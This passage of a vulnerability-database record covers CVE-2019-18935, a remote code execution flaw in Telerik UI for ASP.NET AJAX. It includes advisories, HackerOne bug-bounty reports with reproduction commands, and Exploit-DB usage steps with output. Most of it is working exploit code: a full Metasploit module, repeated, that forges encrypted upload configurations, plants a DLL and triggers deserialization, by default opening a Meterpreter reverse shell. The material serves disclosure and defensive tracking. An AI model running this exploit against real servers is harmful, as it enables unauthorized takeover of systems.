OpenSSL::Cipher.new('AES-256-CBC').send(mode)\n cipher.key = blob.slice(0, 32)\n cipher.iv = blob.slice(32, 48)\n cipher\n end\n\n def decrypt(cipher_text)\n cipher = get_cipher(:decrypt)\n cipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final\n end\n\n def encrypt(plain_text)\n cipher = get_cipher(:encrypt)\n cipher_text = ''\n cipher_text << cipher.update(plain_text) unless plain_text.empty?\n cipher_text << cipher.final\n Rex::Text.encode_base64(cipher_text)\n end\n\n def sign(data)\n Rex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data))\n end\nend\n", "sourceHref": "https://0day.today/exploit/35085", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:12:16", "description": "A remote code execution vulnerability exists in Progress Telerik UI for Asp.Net Ajax. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-09T00:00:00", "type": "checkpoint_advisories", "title": "Progress Telerik UI Remote Code Execution (CVE-2019-18935)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-09-19T00:00:00", "id": "CPAI-2019-1914", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Contains a .NET deserialization vulnerability in the RadAsyncUpload function that can result in remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Progress Telerik UI for ASP.NET deserialization bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18935"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-18935", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-08T10:20:25", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-18T00:00:00", "type": "exploitdb", "title": "Telerik UI - Remote Code Execution via Insecure Deserialization", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-18935", "CVE-2019-18935"], "modified": "2019-12-18T00:00:00", "id": "EDB-ID:47793", "href": "https://www.exploit-db.com/exploits/47793", "sourceData": "See the full write-up at Bishop Fox, CVE-2019-18935: https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui, for a complete walkthrough of vulnerability and exploit details for this issue (along with patching instructions).\r\n\r\nInstall\r\ngit clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935\r\npython3 -m venv env\r\nsource env/bin/activate\r\npip3 install -r requirements.txt\r\n\r\nRequirements\r\nThis exploit leverages encryption logic from RAU_crypto. The RAUCipher class within RAU_crypto.py depends on PyCryptodome, a drop-in replacement for the dead PyCrypto module. PyCryptodome and PyCrypto create problems when installed in the same environment, so the best way to satisfy this dependency is to install the module within a virtual environment, as shown above.\r\n\r\nUsage\r\nCompile mixed mode assembly DLL payload\r\nIn a Windows environment with Visual Studio installed, use build_dll.bat to generate 32- and 64-bit mixed mode assembly DLLs to be used as a payload during deserialization.\r\n\r\nbuild_dll.bat sleep.c\r\nUpload and load payload into application via insecure deserialization\r\nPass the DLL generated above to CVE-2019-18935.py, which will upload the DLL to a directory on the target server (provided that the web server has write permissions) and then load that DLL into the application via the insecure deserialization exploit.\r\n\r\npython3 CVE-2019-18935.py -u <HOST>/Telerik.Web.UI.WebResource.axd?type=rau -v <VERSION> -f 'C:\\Windows\\Temp' -p sleep_2019121205271355_x86.dll\r\n[*] Local payload name: sleep_2019121205271355_x86.dll\r\n[*] Destination folder: C:\\Windows\\Temp\r\n[*] Remote payload name: 1576142987.918625.dll\r\n\r\n{'fileInfo': {'ContentLength': 75264,\r\n 'ContentType': 'application/octet-stream',\r\n 'DateJson': '1970-01-01T00:00:00.000Z',\r\n 'FileName': '1576142987.918625.dll',\r\n 'Index': 0},\r\n 'metaData': {'AsyncUploadTypeName': 'Telerik.Web.UI.UploadedFileInfo, '\r\n 'Telerik.Web.UI, Version=<VERSION>, '\r\n 'Culture=neutral, '\r\n 'PublicKeyToken=<TOKEN>',\r\n 'TempFileName': '1576142987.918625.dll'}}\r\n\r\n[*] Triggering deserialization...\r\n\r\n<title>Runtime Error</title>\r\n<span><H1>Server Error in '/' Application.<hr width=100% size=1 color=silver></H1>\r\n<h2> <i>Runtime Error</i> </h2></span>\r\n...omitted for brevity...\r\n\r\n[*] Response time: 13.01 seconds\r\nIn the example above, the application took at least 10 seconds to respond, indicating that the DLL payload successfully invoked Sleep(10000).\r\n\r\nThanks\r\n@mwulftange initially discovered this vulnerability. @bao7uo wrote all of the logic for breaking RadAsyncUpload encryption, which enabled manipulating the file upload configuration object in rauPostData and subsequently exploiting insecure deserialization of that object.\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47793.zip", "sourceHref": "https://www.exploit-db.com/download/47793", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2020-08-13T18:53:44", "bounty": 0.0, "description": "**Summary:**\nThe website at https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau is vulnerable to CVE-2017-11317 and CVE-2019-18935, allowing an attacker to upload arbitrary files and gain remote code execution on the underlying system.\n\n## Step-by-step Reproduction Instructions\n\n1. Browse to https://\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau. You will see the following message confirming that the file upload handler is registered:\n`{ \"message\" : \"RadAsyncUpload handler is registered succesfully, however, it may not be accessed directly.\" }`\n2. From here on out I used the write-up at https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui for reference.\n3. With a slight modification to the script in the BishopFox write-up, I was able to determine the software version:\n\n```\necho 'test' > testfile.txt\nfor VERSION in $(cat versions.txt); do\n echo -n \"$VERSION: \"\n python3 RAU_crypto.py -P 'C:\\Windows\\Temp' \"$VERSION\" testfile.txt https://\u2588\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau 2>/dev/null | grep fileInfo || echo\n done\n```\nThe `versions.txt` file I used has been attached to this report for ease of replication.\n4. As shown in the results, the version is vulnerable to CVE-2017-11317 and I was able to successfully upload the `testfile.txt`.\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n5. Next, on a Windows system with Visual Studio installed, compile a dll using `build_dll.bat` as shown in the BishopFox article.\n6. Using `python3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588/apps/XTRAHome/Telerik.Web.UI.WebResource.axd?type=rau -v 2016.2.607 -f 'C:\\Windows\\Temp' -p <your_created_dll>.dll`, if you compiled using the PoC in the article you should be able to make the server hang for around 10 seconds. \n7. Once the sleep is over, the server should respond with a similar message as follows: `[*] Response time: 12.34 seconds` showing the server is vulnerable to CVE-2019-18935.\n8. At this point you can upload a reverse shell payload, but I feel the sleep PoC is good enough to prove RCE.\n\n## Product, Version, and Configuration (If applicable)\nTelerik UI 2016.2.607\n\n## References\nhttps://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui\nhttps://github.com/bao7uo/RAU_crypto\nhttps://github.com/noperator/CVE-2019-18935\nhttps://hackerone.com/reports/838196\n\n## Suggested Mitigation/Remediation Actions\nFollow recommended fix actions at https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization\n\n## Impact\n\nRemote Code Execution/Total system compromise.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-02T08:13:07", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution via CVE-2019-18935", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-08-13T18:11:22", "id": "H1:913695", "href": "https://hackerone.com/reports/913695", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-05-07T17:56:52", "bounty": 0.0, "description": "Hello,\nI found an outdated version of Telerik Web UI (v2016.2.607.40) at the following URL: https://\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau.\nThis means that we can achieve full RCE by chaining two different CVEs: CVE-2017-11317, which allows us to upload arbitrary files on the server, and CVE-2019-18935, which is a deserialization vulnerability.\n\nFirst of all, the only thing that I tried to prove that I had successfully achieved code execution was making the server sleep for 10 seconds.\nNo data was compromised.\n\nSteps to reproduce\n---------------------\nThe steps that I followed are thoroughly described in this blog post: <https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui>.\nHere's a quick summary:\n- Download the files in the attachments\n- Make sure you have pycryptodome installed (pip3 install pycryptodome)\n- Run the following command: `python3 CVE-2019-18935.py -u https://\u2588\u2588\u2588\u2588\u2588/Telerik.Web.UI.WebResource.axd?type=rau -v 2016.2.607.40 -f 'C:\\Windows\\Temp' -p sleep_042020163752,45_amd64.dll`\n- The `sleep_042020160430,40_amd64.dll` is supposed to Sleep(10). This will make the server hang for roughly ten seconds, and after that you will get a response like this one: `[*] Response time: 12.88 seconds`\n- The exploit worked.\n\nThings to note\n---------------------\nI had to edit the original exploit code provided in the aforementioned blog post (https://github.com/noperator/CVE-2019-18935) because I noticed that when uploading the .dll file the server added a .tmp at the end of the file name.\nThat's why the original code was failing to exploit the deserialization part.\nI added `+ '.tmp'` at the end of line 95 and after that it worked just fine.\n\nA DLL file can only work once. This means that to test the vulnerability again a new DLL has to be compiled.\nFor this reason I provided several DLLs in the attachments so you don't have to compile them (especially because a windows machine with Visual Studio installed is required).\n\nI didn't upload a reverse shell because I thought it was not a great idea, but if needed I could do it.\n\nHow to fix\n---------------------\nJust upgrade Telerik for ASP.NET AJAX to R3 2019 SP1 (v2019.3.1023) or later.\n\n## Impact\n\nFull **Remote Code Execution** on the vulnerable server.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-04-03T14:48:45", "type": "hackerone", "title": "U.S. Dept Of Defense: Remote Code Execution via Insecure Deserialization in Telerik UI ", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-05-07T16:54:15", "id": "H1:838196", "href": "https://hackerone.com/reports/838196", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-10-20T20:37:38", "description": "", "cvss3": {}, "published": "2020-10-20T00:00:00", "type": "packetstorm", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2020-10-20T00:00:00", "id": "PACKETSTORM:159653", "href": "https://packetstormsecurity.com/files/159653/Telerik-UI-ASP.NET-AJAX-RadAsyncUpload-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \nSALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b \n# default keys per CVE-2017-11317 \nDEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze \nDEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze \nCVE_2017_11317_REFERENCES = [ \n['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption \n['URL', 'https://github.com/bao7uo/RAU_crypto'], \n['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'], \n['URL', 'https://github.com/straightblast/UnRadAsyncUpload/wiki'], \n].freeze \nCVE_2019_18935_REFERENCES = [ \n['CVE', '2019-18935'], # Remote Code Execution via Insecure Deserialization \n['URL', 'https://github.com/noperator/CVE-2019-18935'], \n['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization'], \n['URL', 'https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html'], \n['URL', 'https://labs.bishopfox.com/tech-blog/cve-2019-18935-remote-code-execution-in-telerik-ui'], \n].freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization', \n'Description' => %q{ \nThis module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik \nUI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET \nassembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the \ncryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once \npatched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. \nThis version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915'). \n}, \n'Author' => [ \n'Spencer McIntyre', # Metasploit module \n'Paul Taylor', # (@bao7uo) Python PoCs \n'Markus Wulftange', # (@mwulftange) discovery of CVE-2019-18935 \n'Caleb Gross', # (@noperator) research on CVE-2019-18935 \n'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2017-11317 \n'Oleksandr Mirosh', # (@olekmirosh) discover of CVE-2017-11317 \n'straightblast', # (@straight_blast) discovery of CVE-2017-11317 \n], \n'License' => MSF_LICENSE, \n'References' => CVE_2017_11317_REFERENCES + CVE_2019_18935_REFERENCES, \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => [['Windows', {}],], \n'Payload' => { 'Space' => 2048 }, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'RPORT' => 443, \n'SSL' => true \n}, \n'DefaultTarget' => 0, \n'DisclosureDate' => '2019-12-09', # Telerik article on CVE-2019-18935 \n'Notes' => { \n'Reliability' => [UNRELIABLE_SESSION], \n'Stability' => [CRASH_SAFE], \n'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS] \n}, \n'Privileged' => true \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]), \nOptString.new('FILE_NAME', [ false, 'The base file name for the upload (default will be random)' ]), \nOptString.new('DESTINATION', [ true, 'The destination folder for the upload', 'C:\\\\Windows\\\\Temp' ]), \nOptString.new('RAU_ENCRYPTION_KEY', [ true, 'The encryption key for the RAU configuration data', DEFAULT_RAU_ENCRYPTION_KEY ]), \nOptString.new('RAU_SIGNING_KEY', [ true, 'The signing key for the RAU configuration data', DEFAULT_RAU_SIGNING_KEY ]), \nOptString.new('VERSION', [ false, 'The Telerik UI ASP.NET AJAX version' ]) \n]) \nend \n \ndef dest_file_basename \n@dest_file_name = @dest_file_name || datastore['FILE_NAME'] || Rex::Text.rand_text_alphanumeric(rand(4..35)) + '.dll' \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' } \n}) \nreturn CheckCode::Safe unless res&.code == 200 \nreturn CheckCode::Safe unless res.get_json_document&.dig('message') =~ /RadAsyncUpload handler is registered succesfully/ \n \nif datastore['VERSION'].blank? \n@version = enumerate_version \nelse \nbegin \nupload_file('', datastore['VERSION']) \nrescue Msf::Exploit::Failed \nreturn CheckCode::Safe \nend \n \n@version = datastore['VERSION'] \nend \n \nif !@version.nil? && datastore['RAU_SIGNING_KEY'] == DEFAULT_RAU_SIGNING_KEY && datastore['RAU_ENCRYPTION_KEY'] == DEFAULT_RAU_ENCRYPTION_KEY \nprint_status('Server is using default crypto keys and is vulnerable to CVE-2017-11317') \nreport_vuln({ \nhost: rhost, \nport: rport, \nproto: 'tcp', \nname: 'Unrestricted File Upload via Weak Encryption', \nrefs: CVE_2017_11317_REFERENCES.map { |ctx_id, ctx_val| SiteReference.new(ctx_id, ctx_val) } \n}) \nend \n \n# with custom errors enabled (which is the default), it's not possible to test for the serialization flaw without triggering it \nCheckCode::Detected \nend \n \ndef exploit \nfail_with(Failure::BadConfig, 'No version was specified and it could not be enumerated') if @version.nil? \nupload_file(generate_payload_dll({ mixed_mode: true }), @version) \nexecute_payload \nend \n \ndef execute_payload \nprint_status('Executing the payload...') \nserialized_object = { 'Path' => \"#{datastore['DESTINATION'].chomp('\\\\').gsub('\\\\', '/')}/#{dest_file_basename}.tmp\" } \nserialized_object_type = Msf::Util::DotNetDeserialization::Assemblies::VERSIONS['4.0.0.0']['System.Configuration.Install']['System.Configuration.Install.AssemblyInstaller'] \n \nmsg = rau_mime_payload(serialized_object, serialized_object_type.to_s) \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' }, \n'method' => 'POST', \n'data' => msg.to_s, \n'ctype' => \"multipart/form-data; boundary=#{msg.bound}\" \n}, 5 \n) \n# this request to execute the payload times out on success and returns 200 when it fails, for example because the \n# AllowedCustomMetaDataTypes setting is blocking the necessary code path \nfail_with(Failure::UnexpectedReply, 'Failed to execute the payload') if res&.code == 200 \nend \n \ndef upload_file(file_contents, version) \ntarget_folder = encrypt('') \ntemp_target_folder = encrypt(datastore['DESTINATION'].encode('UTF-16LE')) \nif (version =~ /(\\d{4})\\.\\d+.\\d+/) && Regexp.last_match(1).to_i > 2016 \n# signing is only necessary for versions >= 2017.1.118 (versions that don't match the regex don't require signing) \ntarget_folder << sign(target_folder) \ntemp_target_folder << sign(temp_target_folder) \nend \n \nserialized_object = { \n'TargetFolder' => target_folder, \n'TempTargetFolder' => temp_target_folder, \n'MaxFileSize' => 0, \n'TimeToLive' => { \n'Ticks' => 1440000000000, \n'Days' => 0, \n'Hours' => 40, \n'Minutes' => 0, \n'Seconds' => 0, \n'Milliseconds' => 0, \n'TotalDays' => 1.6666666666666665, \n'TotalHours' => 40, \n'TotalMinutes' => 2400, \n'TotalSeconds' => 144000, \n'TotalMilliseconds' => 144000000 \n}, \n'UseApplicationPoolImpersonation' => false \n} \nserialized_object_type = \"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=#{version}, Culture=neutral, PublicKeyToken=121fae78165ba3d4\" \n \nmsg = rau_mime_payload(serialized_object, serialized_object_type, file_contents: file_contents) \nres = send_request_cgi( \n{ \n'uri' => normalize_uri(target_uri.path, 'Telerik.Web.UI.WebResource.axd'), \n'vars_get' => { 'type' => 'rau' }, \n'method' => 'POST', \n'data' => msg.to_s, \n'ctype' => \"multipart/form-data; boundary=#{msg.bound}\" \n} \n) \nfail_with(Failure::UnexpectedReply, 'The upload failed') unless res&.code == 200 \nmetadata = JSON.parse(decrypt(res.get_json_document.dig('metaData')).force_encoding('UTF-16LE')) \ndest_path = \"#{datastore['DESTINATION'].chomp('\\\\')}\\\\#{metadata['TempFileName']}\" \nprint_good(\"Uploaded #{file_contents.length} bytes to: #{dest_path}\") \nregister_file_for_cleanup(dest_path) \nend \n \ndef rau_mime_payload(serialized_object, serialized_object_type, file_contents: '') \nmetadata = { 'TotalChunks' => 1, 'ChunkIndex' => 0, 'TotalFileSize' => 1, 'UploadID' => dest_file_basename } \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(encrypt(serialized_object.to_json.encode('UTF-16LE')) + '&' + encrypt(serialized_object_type.encode('UTF-16LE')), nil, nil, 'form-data; name=\"rauPostData\"') \npost_data.add_part(file_contents, 'application/octet-stream', 'binary', \"form-data; name=\\\"file\\\"; filename=\\\"#{dest_file_basename}\\\"\") \npost_data.add_part(dest_file_basename, nil, nil, 'form-data; name=\"fileName\"') \npost_data.add_part('application/octet-stream', nil, nil, 'form-data; name=\"contentType\"') \npost_data.add_part('1970-01-01T00:00:00.000Z', nil, nil, 'form-data; name=\"lastModifiedDate\"') \npost_data.add_part(metadata.to_json, nil, nil, 'form-data; name=\"metadata\"') \npost_data \nend \n \ndef enumerate_version \nprint_status('Enumerating the Telerik UI ASP.NET AJAX version, this will fail if the keys are incorrect') \nFile.open(File.join(Msf::Config.data_directory, 'wordlists', 'telerik_ui_asp_net_ajax_versions.txt'), 'rb').each_line do |version| \nversion.strip! \nnext if version.start_with?('#') \n \nvprint_status(\"Checking version: #{version}\") \nbegin \nupload_file('', version) \nrescue Msf::Exploit::Failed \nnext \nend \n \nprint_good(\"The Telerik UI ASP.NET AJAX version has been identified as: #{version}\") \nreturn version \nend \n \nnil \nend \n \n# \n# Crypto Functions \n# \ndef get_cipher(mode) \n# older versions might need to use pbkdf1 \nblob = OpenSSL::PKCS5.pbkdf2_hmac_sha1(datastore['RAU_ENCRYPTION_KEY'], SALT, 1000, 48) \ncipher = OpenSSL::Cipher.new('AES-256-CBC').send(mode) \ncipher.key = blob.slice(0, 32) \ncipher.iv = blob.slice(32, 48) \ncipher \nend \n \ndef decrypt(cipher_text) \ncipher = get_cipher(:decrypt) \ncipher.update(Rex::Text.decode_base64(cipher_text)) + cipher.final \nend \n \ndef encrypt(plain_text) \ncipher = get_cipher(:encrypt) \ncipher_text = '' \ncipher_text << cipher.update(plain_text) unless plain_text.empty? \ncipher_text << cipher.final \nRex::Text.encode_base64(cipher_text) \nend \n \ndef sign(data) \nRex::Text.encode_base64(OpenSSL::HMAC.digest('SHA256', datastore['RAU_SIGNING_KEY'], data)) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/159653/telerik_rau_deserialization.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-06-24T08:42:04", "description": "This module exploits the .NET deserialization vulnerability within the RadAsyncUpload (RAU) component of Telerik UI ASP.NET AJAX that is identified as CVE-2019-18935. In order to do so the module must upload a mixed mode .NET assembly DLL which is then loaded through the deserialization flaw. Uploading the file requires knowledge of the cryptographic keys used by RAU. The default values used by this module are related to CVE-2017-11317, which once patched randomizes these keys. It is also necessary to know the version of Telerik UI ASP.NET that is running. This version number is in the format YYYY.#(.###)? where YYYY is the year of the release (e.g. '2020.3.915').\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-07T17:40:10", "type": "metasploit", "title": "Telerik UI ASP.NET AJAX RadAsyncUpload Deserialization", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11317", "CVE-2019-18935"], "modified": "2021-02-25T14:13:40", "id": "MSF:EXPLOIT-WINDOWS-HTTP-TELERIK_RAU_DESERIALIZATION-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/telerik_rau_deserialization/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n SALT = \"\\x3a\\x54\\x5b\\x19\\x0a\\x22\\x1d\\x44\\x3c\\x58\\x2c\\x33\\x01\".b\n # default keys per CVE-2017-11317\n DEFAULT_RAU_SIGNING_KEY = 'PrivateKeyForHashOfUploadConfiguration'.freeze\n DEFAULT_RAU_ENCRYPTION_KEY = 'PrivateKeyForEncryptionOfRadAsyncUploadConfiguration'.freeze\n CVE_2017_11317_REFERENCES = [\n ['CVE', '2017-11317'], # Unrestricted File Upload via Weak Encryption\n ['URL', 'https://github.com/bao7uo/RAU_crypto'],\n ['URL', 'https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload'],\n ['URL', 